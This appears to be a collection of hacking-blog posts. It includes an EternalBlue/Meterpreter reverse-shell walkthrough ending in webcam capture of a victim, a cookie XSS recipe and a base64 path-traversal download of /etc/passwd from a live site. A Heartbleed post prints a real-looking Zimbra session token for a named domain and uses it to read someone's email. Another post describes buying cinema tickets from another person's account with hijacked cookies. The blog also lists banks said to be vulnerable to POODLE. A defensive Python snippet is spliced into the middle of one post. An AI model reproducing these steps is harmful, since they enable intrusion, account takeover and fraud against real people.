Just wanna share it..

I'm using this msf module https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.

Clone it and copy eternalblue_doublepulsar.rb to /usr/share/metasploit-framework/modules/exploits/windows/smb/.

Run msfconsole and scan your local network with auxiliary/scanner/smb/smb_ms17_010 (MS17-010 SMB RCE Detection).

Now use the exploit exploit/windows/smb/eternalblue_doublepulsar.
For DOUBLEPULSARPATH and ETERNALBLUEPATH, use the Eternalblue-Doublepulsar-Metasploit/deps/ directory. For example /root/Eternalblue-Doublepulsar-Metasploit/deps/.
Don't forget to set the PAYLOAD to windows/x64/meterpreter/reverse_tcp (my target uses x64 so I'm using an x64 payload too).


Once everything is set, run exploit.

Run some interesting commands like webcam_list or webcam_snap.


The victim desktop screenshot.


Tested on my local network; the tool used was Metasploit running on Kali Linux.
That's it, happy hacking!

This vulnerability counts as medium risk. All you need is to install the Cookies Manager+ add-on in Firefox, or any other add-on/plugin used to manipulate cookies.

Browse the page as usual.

Open Cookies Manager+ and search for the vulnerable cookie parameter, in this case the C_UL parameter. Double-click it, change the content to an XSS payload and save it.

Back in the browser, refresh the page and you will see the pop-up.

That's it! This kind of vulnerability is worth 50-100 USD in a bug bounty program. Happy hunting! :)

While browsing I found this cool remote file download vulnerability. :)


If I open the link above, it will download a file for me. Now look at the path and file parameters. They are base64-encoded.


Decode both values and I got this.


Now I know the path and the file name. What if I change them? Let's see.


I changed the path value to /etc/ and the file value to passwd. Encode them to base64 first.


This modified link will download the passwd file from the system.

That's it.. :)

*some links and values in this PoC have been censored/changed because this is a live website.
*admin has been notified by email

Well, this is an old vulnerability called Heartbleed (CVE-2014-0160). Let's exploit this.
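
One way a download handler could confine the decoded path and file parameters to a single directory, as an added example that is not part of the original post or the site's code. DOWNLOAD_ROOT, the function names and the sample requests are assumptions made for the example.

```python
import base64
from pathlib import Path

# Assumed download root; the real site's directory layout is not shown in the post.
DOWNLOAD_ROOT = Path("/srv/app/downloads")


class RejectedDownload(ValueError):
    """The decoded path/file parameters do not name a file under the root."""


def encode_param(text: str) -> str:
    """Base64-encode a value the way the link's path and file parameters carry it."""
    return base64.b64encode(text.encode("utf-8")).decode("ascii")


def decode_param(value: str) -> str:
    try:
        return base64.b64decode(value, validate=True).decode("utf-8")
    except ValueError as exc:  # malformed base64 or bytes that are not UTF-8
        raise RejectedDownload("parameter is not base64-encoded text") from exc


def resolve_download(path_b64: str, file_b64: str, root: Path = DOWNLOAD_ROOT) -> Path:
    """Return the file to serve, or raise RejectedDownload."""
    subdir, name = decode_param(path_b64), decode_param(file_b64)
    if "\x00" in subdir + name:
        raise RejectedDownload("NUL byte in parameter")
    # The file parameter must be a bare file name, never a path.
    if name in ("", ".", "..") or "/" in name or "\\" in name:
        raise RejectedDownload("file parameter is not a plain file name")
    root = root.resolve()
    # An absolute subdir such as "/etc/" replaces root when joined, and ".."
    # climbs out of it; resolve() normalizes both (and follows symlinks) so
    # the containment check sees the path the OS would actually open.
    candidate = (root / subdir / name).resolve()
    if root not in candidate.parents:
        raise RejectedDownload(f"{candidate} is outside {root}")
    return candidate


def is_rejected(path_plain: str, file_plain: str) -> bool:
    """Encode a constructed request and report whether the handler refuses it."""
    try:
        resolve_download(encode_param(path_plain), encode_param(file_plain))
    except RejectedDownload:
        return True
    return False
```

With this check, is_rejected("/etc/", "passwd") returns True for the modified request described in the post, while a request for a file below the download root resolves normally.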

Run the Heartbleed exploit and you'll get the Zimbra cookie.

See the Referer and Cookie? Use those to log in.

Referer: https://mx.tempo.co.id/
Cookie: ZM_TEST=true; ZM_AUTH_TOKEN=0_73ec70e72712cb16eaee148d405d1b8297c411f2_69643d33363a66356438353363632d633032372d343032302d383566322d3635636436366531623932313b6578703d31333a313438373232343637313230353b747970653d363a7a696d6272613b; JSESSIONID=1xv343h6xss51a0uhvn29oe6x

Open the Referer site https://mx.tempo.co.id/ in a Firefox that has the Cookie Injector plugin installed and press Alt+C to show the Cookie Injector.

You'll see "Wireshark Cookie Dump" there. Now paste the Cookie and click OK. You should get a popup saying "All Cookie Have Been Written".

Refresh (F5) the site again and you are now logged in to the user's email.

Type password in the search box and hit enter... :p


Hi, it's been a while since my last post.. :)

21 Cineplex is one of the largest cinema groups in Indonesia (Cinema 21, Cinema XXI and The Premiere). In this post I wanna show you guys how I buy a ticket using other people's accounts on the 21 Cineplex website. Well, this is an old vulnerability but they never fixed it, so let's have some fun. :p

Start by finding user cookies and a referer link.

I will use these cookies and this referer link. Open the referer link in the browser.

As we can see on the left side, I don't have access to this account. Now use the user cookies.
I'm using Cookie Injector to write the cookies.

Copy and paste the user cookies into Cookie Injector, then click OK and we'll have the screen below. This means the user cookies were written successfully.

Now reopen the referer link. I will automatically be logged in to the user page.

Let's buy a ticket with this account. The account balance is Rp. 165.000.
I wanna watch Inferno :)

Select the city, cinema, date, time and how many tickets we want to buy. Click CONTINUE, select a seat and click BUY NOW.

Transaction process.

And I have my free ticket.. :)
I also have the transaction code 11636 to pick up the ticket.

As we can see, the user balance is now Rp. 104.000.

That's it for today. I have a movie to watch. :p

Stay safe! Stay cool! :)


Hi all..

I'm using an HP ProBook with Kubuntu 14.04 but my WiFi keeps dropping the connection.
I have to reboot the laptop to connect to WiFi again.

I use this command to fix my WiFi problem and it's working fine.

echo "options rtl8723be fwlps=N ips=N" | sudo tee /etc/modprobe.d/rtl8723be.conf

Anyway, my chipset is Realtek Semiconductor Co., Ltd. RTL8723BE PCIe Wireless Network Adapter.

This setting can be different depending on your chipset.
To see your chipset, you can use this command.


I hope this can be useful for you too!


Here are some Indonesian banks that are still vulnerable to the POODLE attack.
I'm using the SSL/TLS Security Test by High-Tech Bridge and a manual scan using nmap.

>> https://iperson.bankjatim.co.id

SSL/TLS Security Test

Script scan nmap

>> https://netbank.jtrustbank.co.id

SSL/TLS Security Test

Script scan nmap

>> https://cib.qnb.co.id

SSL/TLS Security Test

Script scan nmap

>> https://www.tunaiku.amarbank.co.id

SSL/TLS Security Test

Script scan nmap

>> https://www.nobuwwwbanking.com

SSL/TLS Security Test

Script scan nmap

Happy hunting guys!

Some banks have been notified about this vulnerability.